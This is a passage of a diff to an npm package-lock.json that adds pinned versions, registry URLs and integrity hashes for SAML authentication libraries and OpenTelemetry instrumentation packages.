"^1.4.2", + "@types/xml-encryption": "^1.2.1", + "@types/xml2js": "^0.4.11", + "@xmldom/xmldom": "^0.8.6", + "debug": "^4.3.4", + "xml-crypto": "^3.0.1", + "xml-encryption": "^3.0.2", + "xml2js": "^0.5.0", + "xmlbuilder": "^15.1.1" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@node-saml/node-saml/node_modules/@xmldom/xmldom": { + "version": "0.8.10", + "resolved": "https://registry.npmjs.org/@xmldom/xmldom/-/xmldom-0.8.10.tgz", + "integrity": "sha512-2WALfTl4xo2SkGCYRt6rDTFfk9R1czmBvUQy12gK2KuRKIpWEhcbbzy8EZXtz/jkRqHX8bFEc6FC1HjX4TUWYw==", + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/@node-saml/node-saml/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@node-saml/node-saml/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/@node-saml/node-saml/node_modules/xml-encryption": { + "version": "3.0.2", + "resolved": 
"https://registry.npmjs.org/xml-encryption/-/xml-encryption-3.0.2.tgz", + "integrity": "sha512-VxYXPvsWB01/aqVLd6ZMPWZ+qaj0aIdF+cStrVJMcFj3iymwZeI0ABzB3VqMYv48DkSpRhnrXqTUkR34j+UDyg==", + "dependencies": { + "@xmldom/xmldom": "^0.8.5", + "escape-html": "^1.0.3", + "xpath": "0.0.32" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@node-saml/node-saml/node_modules/xml2js": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.5.0.tgz", + "integrity": "sha512-drPFnkQJik/O+uPKpqSgr22mpuFHqKdbS835iAQrUC73L2F5WkboIRd63ai/2Yg6I1jzifPFKH2NTK+cfglkIA==", + "dependencies": { + "sax": ">=0.6.0", + "xmlbuilder": "~11.0.0" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/@node-saml/node-saml/node_modules/xml2js/node_modules/xmlbuilder": { + "version": "11.0.1", + "resolved": "https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-11.0.1.tgz", + "integrity": "sha512-fDlsI/kFEx7gLvbecc0/ohLG50fugQp8ryHzMTuW9vSa1GJ0XYWKnhsUx7oie3G98+r56aTQIUB4kht42R3JvA==", + "engines": { + "node": ">=4.0" + } + }, + "node_modules/@node-saml/node-saml/node_modules/xpath": { + "version": "0.0.32", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.32.tgz", + "integrity": "sha512-rxMJhSIoiO8vXcWvSifKqhvV96GjiD5wYb8/QHdoRyQvraTpp4IEv944nhGausZZ3u7dhQXteZuZbaqfpB7uYw==", + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/@node-saml/passport-saml": { + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/@node-saml/passport-saml/-/passport-saml-4.0.4.tgz", + "integrity": "sha512-xFw3gw0yo+K1mzlkW15NeBF7cVpRHN/4vpjmBKzov5YFImCWh/G0LcTZ8krH3yk2/eRPc3Or8LRPudVJBjmYaw==", + "dependencies": { + "@node-saml/node-saml": "^4.0.4", + "@types/express": "^4.17.14", + "@types/passport": "^1.0.11", + "@types/passport-strategy": "^0.2.35", + "passport": "^0.6.0", + "passport-strategy": "^1.0.0" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@nodelib/fs.scandir": { + "version": "2.1.5", + "resolved": "https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz", + "integrity": "sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==", + "dependencies": { + "@nodelib/fs.stat": "2.0.5", + "run-parallel": "^1.1.9" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/@nodelib/fs.stat": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz", + "integrity": "sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==", + "engines": { + "node": ">= 8" + } + }, + "node_modules/@nodelib/fs.walk": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz", + "integrity": "sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==", + "dependencies": { + "@nodelib/fs.scandir": "2.1.5", + "fastq": "^1.6.0" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/@opentelemetry/api": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/api/-/api-1.4.1.tgz", + "integrity": "sha512-O2yRJce1GOc6PAy3QxFM4NzFiWzvScDC1/5ihYBL6BUEVdq0XMWN01sppE+H6bBXbaFYipjwFLEWLg5PaSOThA==", + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/@opentelemetry/api-logs": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/api-logs/-/api-logs-0.41.2.tgz", + "integrity": "sha512-JEV2RAqijAFdWeT6HddYymfnkiRu2ASxoTBr4WsnGJhOjWZkEy6vp+Sx9ozr1NaIODOa2HUyckExIqQjn6qywQ==", + "dependencies": { + 
"@opentelemetry/api": "^1.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@opentelemetry/auto-instrumentations-node": { + "version": "0.39.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/auto-instrumentations-node/-/auto-instrumentations-node-0.39.2.tgz", + "integrity": "sha512-rC8r7rx8U0XT/0F3TyMCyP+lkFeWyenkfeVR2OPvo685TQRA5byTEu4+C3ZHNSbGNcvGUamcSsa0DQ6AvKlINQ==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/instrumentation-amqplib": "^0.33.1", + "@opentelemetry/instrumentation-aws-lambda": "^0.37.0", + "@opentelemetry/instrumentation-aws-sdk": "^0.36.0", + "@opentelemetry/instrumentation-bunyan": "^0.32.1", + "@opentelemetry/instrumentation-cassandra-driver": "^0.33.1", + "@opentelemetry/instrumentation-connect": "^0.32.1", + "@opentelemetry/instrumentation-cucumber": "^0.1.0", + "@opentelemetry/instrumentation-dataloader": "^0.5.1", + "@opentelemetry/instrumentation-dns": "^0.32.2", + "@opentelemetry/instrumentation-express": "^0.33.1", + "@opentelemetry/instrumentation-fastify": "^0.32.2", + "@opentelemetry/instrumentation-fs": "^0.8.1", + "@opentelemetry/instrumentation-generic-pool": "^0.32.2", + "@opentelemetry/instrumentation-graphql": "^0.35.1", + "@opentelemetry/instrumentation-grpc": "^0.41.2", + "@opentelemetry/instrumentation-hapi": "^0.33.0", + "@opentelemetry/instrumentation-http": "^0.41.2", + "@opentelemetry/instrumentation-ioredis": "^0.35.1", + "@opentelemetry/instrumentation-knex": "^0.32.1", + "@opentelemetry/instrumentation-koa": "^0.36.0", + "@opentelemetry/instrumentation-lru-memoizer": "^0.33.1", + "@opentelemetry/instrumentation-memcached": "^0.32.1", + "@opentelemetry/instrumentation-mongodb": "^0.37.0", + "@opentelemetry/instrumentation-mongoose": "^0.33.1", + "@opentelemetry/instrumentation-mysql": "^0.34.1", + "@opentelemetry/instrumentation-mysql2": "^0.34.1", + "@opentelemetry/instrumentation-nestjs-core": "^0.33.1", + "@opentelemetry/instrumentation-net": "^0.32.1", + "@opentelemetry/instrumentation-pg": "^0.36.1", + "@opentelemetry/instrumentation-pino": "^0.34.1", + "@opentelemetry/instrumentation-redis": "^0.35.1", + "@opentelemetry/instrumentation-redis-4": "^0.35.1", + "@opentelemetry/instrumentation-restify": "^0.34.0", + "@opentelemetry/instrumentation-router": "^0.33.1", + "@opentelemetry/instrumentation-socket.io": "^0.34.1", + "@opentelemetry/instrumentation-tedious": "^0.6.1", + "@opentelemetry/instrumentation-winston": "^0.32.1", + "@opentelemetry/resource-detector-alibaba-cloud": "^0.28.1", + "@opentelemetry/resource-detector-aws": "^1.3.1", + "@opentelemetry/resource-detector-container": "^0.3.1", + "@opentelemetry/resource-detector-gcp": "^0.29.1", + "@opentelemetry/resources": "^1.12.0", + "@opentelemetry/sdk-node": "^0.41.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.4.1" + } + }, + "node_modules/@opentelemetry/context-async-hooks": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/context-async-hooks/-/context-async-hooks-1.15.2.tgz", + "integrity": "sha512-VAMHG67srGFQDG/N2ns5AyUT9vUcoKpZ/NpJ5fDQIPfJd7t3ju+aHwvDsMcrYBWuCh03U3Ky6o16+872CZchBg==", + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.0.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/core": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/core/-/core-1.15.2.tgz", + "integrity": 
"sha512-+gBv15ta96WqkHZaPpcDHiaz0utiiHZVfm2YOYSqFGrUaJpPkMoSuLBB58YFQGi6Rsb9EHos84X6X5+9JspmLw==", + "dependencies": { + "@opentelemetry/semantic-conventions": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.0.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/exporter-jaeger": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/exporter-jaeger/-/exporter-jaeger-1.15.2.tgz", + "integrity": "sha512-BwYd5836GYvuiQcF4l5X0ca09jGJr/F37MMGyz94VH0b1dp0uYBwRJw2CQh56RlVZEdpKv29JyDRVZ/4UrRgLQ==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2", + "@opentelemetry/semantic-conventions": "1.15.2", + "jaeger-client": "^3.15.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/exporter-trace-otlp-grpc": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/exporter-trace-otlp-grpc/-/exporter-trace-otlp-grpc-0.41.2.tgz", + "integrity": "sha512-tRM/mq7PFj7mXCws5ICMVp/rmgU93JvZdoLE0uLj4tugNz231u2ZgeRYXulBjdeHM88ZQSsWTJMu2mvr/3JV1A==", + "dependencies": { + "@grpc/grpc-js": "^1.7.1", + "@opentelemetry/core": "1.15.2", + "@opentelemetry/otlp-grpc-exporter-base": "0.41.2", + "@opentelemetry/otlp-transformer": "0.41.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/exporter-trace-otlp-grpc/node_modules/@opentelemetry/otlp-transformer": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/otlp-transformer/-/otlp-transformer-0.41.2.tgz", + "integrity": "sha512-jJbPwB0tNu2v+Xi0c/v/R3YBLJKLonw1p+v3RVjT2VfzeUyzSp/tBeVdY7RZtL6dzZpA9XSmp8UEfWIFQo33yA==", + "dependencies": { + "@opentelemetry/api-logs": "0.41.2", + "@opentelemetry/core": "1.15.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-logs": "0.41.2", + "@opentelemetry/sdk-metrics": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.3.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/exporter-trace-otlp-http": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/exporter-trace-otlp-http/-/exporter-trace-otlp-http-0.41.2.tgz", + "integrity": "sha512-Y0fGLipjZXLMelWtlS1/MDtrPxf25oM408KukRdkN31a1MEFo4h/ZkNwS7ZfmqHGUa+4rWRt2bi6JBiqy7Ytgw==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/otlp-exporter-base": "0.41.2", + "@opentelemetry/otlp-transformer": "0.41.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/exporter-trace-otlp-http/node_modules/@opentelemetry/otlp-transformer": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/otlp-transformer/-/otlp-transformer-0.41.2.tgz", + "integrity": "sha512-jJbPwB0tNu2v+Xi0c/v/R3YBLJKLonw1p+v3RVjT2VfzeUyzSp/tBeVdY7RZtL6dzZpA9XSmp8UEfWIFQo33yA==", + "dependencies": { + "@opentelemetry/api-logs": "0.41.2", + "@opentelemetry/core": "1.15.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-logs": "0.41.2", + "@opentelemetry/sdk-metrics": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2" + 
}, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.3.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/exporter-trace-otlp-proto": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/exporter-trace-otlp-proto/-/exporter-trace-otlp-proto-0.41.2.tgz", + "integrity": "sha512-IGZga9IIckqYE3IpRE9FO9G5umabObIrChlXUHYpMJtDgx797dsb3qXCvLeuAwB+HoB8NsEZstlzmLnoa6/HmA==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/otlp-exporter-base": "0.41.2", + "@opentelemetry/otlp-proto-exporter-base": "0.41.2", + "@opentelemetry/otlp-transformer": "0.41.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/exporter-trace-otlp-proto/node_modules/@opentelemetry/otlp-transformer": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/otlp-transformer/-/otlp-transformer-0.41.2.tgz", + "integrity": "sha512-jJbPwB0tNu2v+Xi0c/v/R3YBLJKLonw1p+v3RVjT2VfzeUyzSp/tBeVdY7RZtL6dzZpA9XSmp8UEfWIFQo33yA==", + "dependencies": { + "@opentelemetry/api-logs": "0.41.2", + "@opentelemetry/core": "1.15.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-logs": "0.41.2", + "@opentelemetry/sdk-metrics": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.3.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/exporter-zipkin": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/exporter-zipkin/-/exporter-zipkin-1.15.2.tgz", + "integrity": "sha512-j9dPe8tyx4KqIqJAfZ/LCYfkF9+ggsT0V1+bVg9ZKTBNcLf5dTsTMdcxUxc/9s599kgcn6UERnti/tozbzwa6Q==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/resources": "1.15.2", + "@opentelemetry/sdk-trace-base": "1.15.2", + "@opentelemetry/semantic-conventions": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/instrumentation": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation/-/instrumentation-0.41.2.tgz", + "integrity": "sha512-rxU72E0pKNH6ae2w5+xgVYZLzc5mlxAbGzF4shxMVK8YC2QQsfN38B2GPbj0jvrKWWNUElfclQ+YTykkNg/grw==", + "dependencies": { + "@types/shimmer": "^1.0.2", + "import-in-the-middle": "1.4.2", + "require-in-the-middle": "^7.1.1", + "semver": "^7.5.1", + "shimmer": "^1.2.1" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-amqplib": { + "version": "0.33.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-amqplib/-/instrumentation-amqplib-0.33.1.tgz", + "integrity": "sha512-Eg797WDHVDcRr6+5tihh7ab+ZjS5yCOoW4PkUYCcJHVT31AGfi+PlkLgHknW+uT1oKijMC4D1p6jDa/2rzRv/g==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-aws-lambda": { + "version": "0.37.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-aws-lambda/-/instrumentation-aws-lambda-0.37.0.tgz", + "integrity": 
"sha512-jGXW3iQhs/g9ckq2zbk16o3+LKBhZv96Ghhh2IomxLMm4aNTZgoVMgw6mdwtXxmjcpJoG0K1HK4amxSMLV/mUA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/propagator-aws-xray": "^1.3.1", + "@opentelemetry/resources": "^1.8.0", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/aws-lambda": "8.10.119" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-aws-sdk": { + "version": "0.36.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-aws-sdk/-/instrumentation-aws-sdk-0.36.0.tgz", + "integrity": "sha512-I7lOeAxjH9GZbmsqf5YnxwD9btliHHQztySgq2gO2P3zF0Wzd75rBEexbHcIyo/YoQiKpfcWfiNGw9NWgJPleQ==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/propagation-utils": "^0.30.1", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-bunyan": { + "version": "0.32.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-bunyan/-/instrumentation-bunyan-0.32.1.tgz", + "integrity": "sha512-TjH357ldA5DpK09XUDWffqV9Km++N9H0dwmxHrElM2TSe4Usgkgw6mlodbuh45hoVDD+cCPi+GO6Dq1QLVEdZg==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@types/bunyan": "1.8.8" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-cassandra-driver": { + "version": "0.33.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-cassandra-driver/-/instrumentation-cassandra-driver-0.33.1.tgz", + "integrity": "sha512-nn8XtLB1XmViEAnNnZ43jHojYxgNJ1W+QF2B3yBmfVqXJnE0IbzhIiPmU+Zx3ZSzIoWS0EQQM3ljcgDC03FZ7A==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-connect": { + "version": "0.32.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-connect/-/instrumentation-connect-0.32.1.tgz", + "integrity": "sha512-QHi0hTXtqZj3wSyvKwFmkGYHRnGdl8w76MHZj3Rekxe4ILpcn78fZGJSbA+0eYdOWHnGP0c483uMOeGH08XYmA==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/connect": "3.4.35" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-cucumber": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-cucumber/-/instrumentation-cucumber-0.1.0.tgz", + "integrity": "sha512-xSJBLKSjdBWzT8mYgsEt0RW9i0gBPRDh/lL9WXjTv7E1SMWyVAxMLURV+KfVmRjRltwlgXi+/j70dY+k88Q5ZA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0" + } + }, + "node_modules/@opentelemetry/instrumentation-dataloader": { + "version": "0.5.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-dataloader/-/instrumentation-dataloader-0.5.1.tgz", + "integrity": 
"sha512-dqYITnlCo7FSZ8mhyxh9TtogwcebGcuMaXTjYDyIKGshDcjCxhvhNjFDe4y3RD/g/EFKINkYVkVXB1lDqZdxTA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-dns": { + "version": "0.32.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-dns/-/instrumentation-dns-0.32.2.tgz", + "integrity": "sha512-6KNN35ot/qyOQN0jh/+9mGCFeWM40fhcJWgg82D0syuxQq2YaUvyGLw6FAi7f0xxaeOPLCQxSK5wL9jTn3KF2g==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "semver": "^7.5.4" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-dns/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/instrumentation-dns/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@opentelemetry/instrumentation-dns/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@opentelemetry/instrumentation-express": { + "version": "0.33.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-express/-/instrumentation-express-0.33.1.tgz", + "integrity": "sha512-awrpiTZWnLOCJ4TeDMTrs6/gH/oXbNipoPx3WUKQlA1yfMlpNynqokTyCYv1n10Zu9Y2P/nIhoNnUw0ywp61nA==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/express": "4.17.17" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-fastify": { + "version": "0.32.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-fastify/-/instrumentation-fastify-0.32.2.tgz", + "integrity": "sha512-DKa7SgxTtZ0O1ngGtAdwr/g8XguYw6KvLNME+J8rt6QpWQM+xytS0bg4atZAyt6aeYr/kO1sMrGXSlHEEYWIhg==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-fs": { + "version": "0.8.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-fs/-/instrumentation-fs-0.8.1.tgz", + "integrity": "sha512-a5U6ydfqVeT4Zp6GL5lZDZNJAmic3CCtgg/f2yqvnpq2fE0cyD/XlW9JWzGhAJaq29E1bxtb9FJ0n6ee3c9dYQ==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + 
"engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-generic-pool": { + "version": "0.32.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-generic-pool/-/instrumentation-generic-pool-0.32.2.tgz", + "integrity": "sha512-HMAkKOfSZMKy4YfDLwSByR2q74pk3TMpSxgwWYLeezNpscnNAc4mtZtbWdUL62v8IaCXIc/qizwQYkcKqvGnZQ==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-graphql": { + "version": "0.35.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-graphql/-/instrumentation-graphql-0.35.1.tgz", + "integrity": "sha512-bAM4W5wU0lZ1UIKK/5b4p8LEU8N6W+VgpcnUIK7GTTDxdhcWTd3Q6oyS6nauhZSzEnAEmmJVXaLQAGIU4sEkyA==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-grpc": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-grpc/-/instrumentation-grpc-0.41.2.tgz", + "integrity": "sha512-+fh9GUFv97p25CMreUv4OdP5L21hPgfX3d4fuQ0KIgIZIaX2M6/8cr5Ik+8zWsyhYzfFX3CKq6BXm3UBg7cswQ==", + "dependencies": { + "@opentelemetry/instrumentation": "0.41.2", + "@opentelemetry/semantic-conventions": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-hapi": { + "version": "0.33.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-hapi/-/instrumentation-hapi-0.33.0.tgz", + "integrity": "sha512-c+I/25OrovuSdeb/OQIZIVTSiatTcH+KE8Nna0xAnwaG4H7Q7eoGet7IBPzNTbunXY9Xt77oFVsN1TMeXeDktg==", + "dependencies": { + "@opentelemetry/core": "^1.8.0", + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.0.0", + "@types/hapi__hapi": "20.0.13" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-http": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/instrumentation-http/-/instrumentation-http-0.41.2.tgz", + "integrity": "sha512-dzOC6xkfK0LM6Dzo91aInLdSbdIzKA0IgSDnyLi6YZ0Z7c1bfrFncFx/3gZs8vi+KXLALgfMlpzE7IYDW/cM3A==", + "dependencies": { + "@opentelemetry/core": "1.15.2", + "@opentelemetry/instrumentation": "0.41.2", + "@opentelemetry/semantic-conventions": "1.15.2", + "semver": "^7.5.1" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.3.0" + } + }, + "node_modules/@opentelemetry/instrumentation-http/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + 